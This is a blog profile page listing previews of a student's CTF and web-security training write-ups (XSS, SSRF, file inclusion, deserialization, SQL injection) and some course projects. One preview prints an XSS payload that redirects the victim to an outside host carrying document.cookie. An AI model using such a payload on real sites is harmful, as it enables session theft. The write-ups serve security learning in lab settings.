1 沐目_Chen

尚未进行身份认证

暂无相关描述

等级
TA的排名 15w+

Jarvis OJ PHPINFO

1.知识点1.1php处理器PHP内置了三个处理器,用来对session进行序列化和反序列化。在php5.5.4以前默认选择的是php,5.5.4之后就是php_serialize,这里面是php_serialize。php处理器:PHPphp_binaryphp_serialize(php>=5.5.4)1.2反序列化漏洞这个配置可以在php.ini文件中的“se...

2019-08-12 20:31:03

Weblogic ssrf

集训第五周星期一~二一.首先总结知识点:1.ssrf:服务端请求伪造,好像有三种利用方式,但是我目前就只会最普通的一种,利用SSRF进行端口探测,也是写这道题需要用的。有时候服务端的一个内网中有漏洞,可是我们又没有办法直接访问,所以我们就需要通过服务器,去访问服务器的内网,所以叫服务端请求伪造。有这个漏洞的条件,就是服务器端,需要有与内网传输数据的接口,要不然无法访问内网啊。通常情况下,比...

2019-07-30 15:18:59

实验吧 让我进去

集训第四周星期五知识点:写CTF题,应该习惯行的看一下源码,扫一下目录,抓一下包打开题后发现一个登陆框,以为是SQL注入,但实际上并不是。然后抓包,在cookie里看见一个东西“source”等于零,让后改成一,发包,看见了源码。$flag="XXXXXXXXXXXXXXXXXXXXXXX";$secret="XXXXXXXXXXXXXXX";//Thissecretis...

2019-07-26 16:51:08

Jarvis OJ Easy Gallery

集训第四周星期五知识点:1.图片路径可以再页面源代码找到2.%00可以截断文件按包含的后缀打开题后,扫视了一圈,页面源代码和数据包没有什么提示。于是去看URL,发现有一个page参数,让后想到文件包含漏洞,试了一下,确实可以包含,但是把“://”给过滤了,没法远程包含了,也没有办法用php://伪协议了。然后发现又有一个文件上传界面,应该想到文件上传和文件包含结合的。但是我还是直...

2019-07-26 11:43:48

攻防世界 mfw

集训第四周星期一到星期三星期一序列化的目的是为了将某些对象存储到磁盘上,从而长期保存,例如最常见的是Web服务器中的Session对象,当有10万用户并发访问,就有可能出现10万个Session对象,内存可能吃不消,于是Web容器就会把一些seesion先序列化到硬盘中,等要用了,再把保存在硬盘中的对象还原到内存中。星期三md5弱比较,为0e开头的会被识别为科学记数法,结果均为0md...

2019-07-24 20:01:41

DVWA XSS 盗取cookie实战

DVWAXSS盗取cookie实战今天把dvwa的XSS的漏洞又给利用了一下,以前都是弹个框就没了,这次要试试盗cookie。这次说一个东西,很基础的东西,但我也是现在才明白,就是关于html编码,绕过过滤的事情。以前总感觉HTML编码绕过滤,这个方法时灵时不灵,直到现在,才发现原来是自己的问题。这个东西要么用十六进制&#X**,要么用十进制&#ASCLL,我以前竟然傻的直...

2019-07-13 21:12:18

集训第二周 星期二

XSS的利用获取cookie今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。主要就是围绕这句话展开的<script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.cookie</script>1.首先找到XSS漏洞,然后让它可以执行这句话。2.document.loca...

2019-07-11 17:21:49

test.xss.tv

集训第二周星期一(下)下午接着XSS,先放靶场http://test.xss.tv/level1.php?name=testlevel1这一题也没什么,主要就是找到注入点,让name等于test23,看下页面源码,发现只有一个地方出现了我们输入得东西。于是我们构造payload<script>alert(1)</script>level2这个我就极其得...

2019-07-09 16:02:08

xss.haozi.me

集训第二周星期一第二个星期了,再发一篇。感觉自己好像没学什么东西。就学了个HTML和JavaScript。今天开始XSS的实战,这篇博客主要就是写一下题解。先给出XSS靶场的地址:https://xss.haozi.me/#/0x00我是在谷歌上写的,不知道为什么同样的payload在火狐上不能用。0x00第一关应该没什么讲的吧,啥都没有,直接给payload了。<img...

2019-07-09 09:26:05

集训第三天

集训第三天集训第三天,由于上午有些事情,没有学习,所以今天可能学习得东西应该会有点少,哈哈。今天本来打算去学习一下JavaScript,但是我们下个学期学校会讲,于是打算到之后再学,要不然太浪费时间了,书也白借了。让后去了解了一下CSRF,感觉它的作用是去让受害者,在登陆某个网站后,发给受害者一个URL,让后受害者点击这个URL,URL就会利用受害者的cookie,向服务器发送一个请求,这...

2019-07-03 18:47:32

集训第一天

sql注入的复习今天正式开始集训,不知道会怎么样,希望可以学到一些东西。每天把自己学的东西记录一下吧。今天没学什么,主要是复习前面的东西,比如SQL注入,时间是把杀猪刀,以前学的东西,长时间不用,都忘了。哎,没办法。记了两道实验吧的题,以前也写过,但是没怎么记住。1.你真的会PHP吗:通过把空字符可以绕过is_numeric的判断(如%00,%20)利用intval函数溢出绕过2.加了料...

2019-07-03 18:47:18

C++课程设计 信息管理系统

半年一个课程设计,本来想做的游戏的,但是没有做出来,老脸一红。这个与上个学期的课程设计主要亮点是,用了C++的语法,好像是句废话;让后做了个登陆界面;使用了C++的STL标注库;工号不能重复;增加了模糊查询这个功能。下学期,绝对不做这个东西了。太没意思了。本来还想加多线程了,但是不会弄,丢人啊!#include<iostream>#include<fstream>#...

2019-07-01 21:14:24

ISCC WEB4 变量覆盖漏洞

打开链接,开始审计。<?phperror_reporting(0);include("flag.php");$hashed_key='ddbafb4eb89e218701472d3f6c087fdf7119dfdd560f9d1fcbe7482b0feea05a';$parsed=parse_url($_SERVER['REQUEST_URI']);if(isset($...

2019-05-31 07:51:27

web1 ISCC

打开连接,又是审计,<?phperror_reporting(0);require'flag.php';$value=$_GET['value'];$password=$_GET['password'];$username='';for($i=0;$i<count($value);++$i){if($value[$i]>...

2019-05-31 07:51:11

C语言 课程设计 信息管理

大一写的课程设计,很一般,但是留个纪念吧,有不懂的可以留言啊!#include<stdio.h>#include<malloc.h>#include<string.h>#include<time.h>voidinterface();///界面voidsavedata(structf*x);/...

2019-05-31 07:49:24

bugku 速度要快

在源代码里有一个提示,说传递margin参数,但是又不知道传什么,在响应头里有个flag,应该是base64加密的,然后解密后发现好像还可以再解密一次,让后再此解密,所以就把base64解密的数值传过去试试。但是好像它一直在变,让后就要写脚本自动传递,我也不知道为啥。写脚本和一直变又什么联系吗,但还是写了一个,试了试。importrequestsimportbase64url="http...

2019-05-15 21:39:27

攻防世界 unserialize3

classxctf{public$flag='111';publicfunction__wakeup(){exit('badrequests');}?code=当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。虽然这样说,但我还是不太理解,回来理解了再来补充吧。在线序列化与反序列化...

2019-05-14 20:58:09

小哼买书 啊哈 算法

小哼的学校要建立一个图书角,老师派小哼去找一些同学做调查,看看同学们都喜欢读哪些书。小哼让每个同学写出一个自己想读的书的ISBN号(你知道吗?每本书都有唯一的ISBN号,不信的话你去找本书翻到背面看看)。当然有一些好书会有很多同学都喜欢,这样就会收集到很多重复的ISBN号。小哼需要去掉其中重复的ISBN号,即每个ISBN号只保留一个,也就说同样的书只买一本(学校真是够抠门的)。...

2019-05-11 21:24:05

Jarvis OJ Simple Injection

JarvisOJSimpleInjection题目提示说是sql注入,一打开就是登陆界面,发现输入admin显示的是密码错误,输入其他的是用户名错误,绕后就想到了实验吧的一道题,“”...

2019-05-10 20:31:46

因缺思汀的绕过

因缺思汀的绕过打开源代码,发现一个提示,又是代码审计。<?phperror_reporting(0);if(!isset($_POST['uname'])||!isset($_POST['pwd'])){ echo'<formaction=""method="post">'."<br/>"; echo'<inputname="u...

2019-05-10 19:40:58

查看更多

勋章 我的勋章
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv3
    勤写标兵Lv3
    授予每个自然周发布7篇到8篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。